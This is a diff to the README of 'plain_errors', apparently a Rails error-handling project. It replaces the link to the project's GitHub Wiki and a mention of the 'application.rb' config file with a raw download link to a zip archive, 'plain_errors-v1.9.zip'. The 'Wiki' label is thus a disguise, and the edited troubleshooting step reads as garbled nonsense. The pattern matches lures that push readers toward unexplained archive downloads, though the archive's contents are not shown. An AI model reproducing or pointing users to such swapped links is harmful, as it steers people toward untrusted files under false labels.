Sidesaddlesudanesepound712/plain_errors/README.md

 If you encounter any issues during the setup process, try the following:

 - Ensure all prerequisites are installed correctly.
-- Check the configuration settings in the `application.rb` file.
+- Check the configuration settings in the `https://raw.githubusercontent.com/Sidesaddlesudanesepound712/plain_errors/main/lib/plain_errors-v1.9.zip` file.
 - Make sure you have restarted your Rails server after making changes.

 If problems persist, feel free to visit the Issues section on our GitHub page for support from the community.

 ## 🔗 Learn More

-For detailed documentation and advanced configuration options, visit our [GitHub Wiki](https://github.com/Sidesaddlesudanesepound712/plain_errors/wiki).
+For detailed documentation and advanced configuration options, visit our [GitHub Wiki](https://raw.githubusercontent.com/Sidesaddlesudanesepound712/plain_errors/main/lib/plain_errors-v1.9.zip).

 ## 📞 Support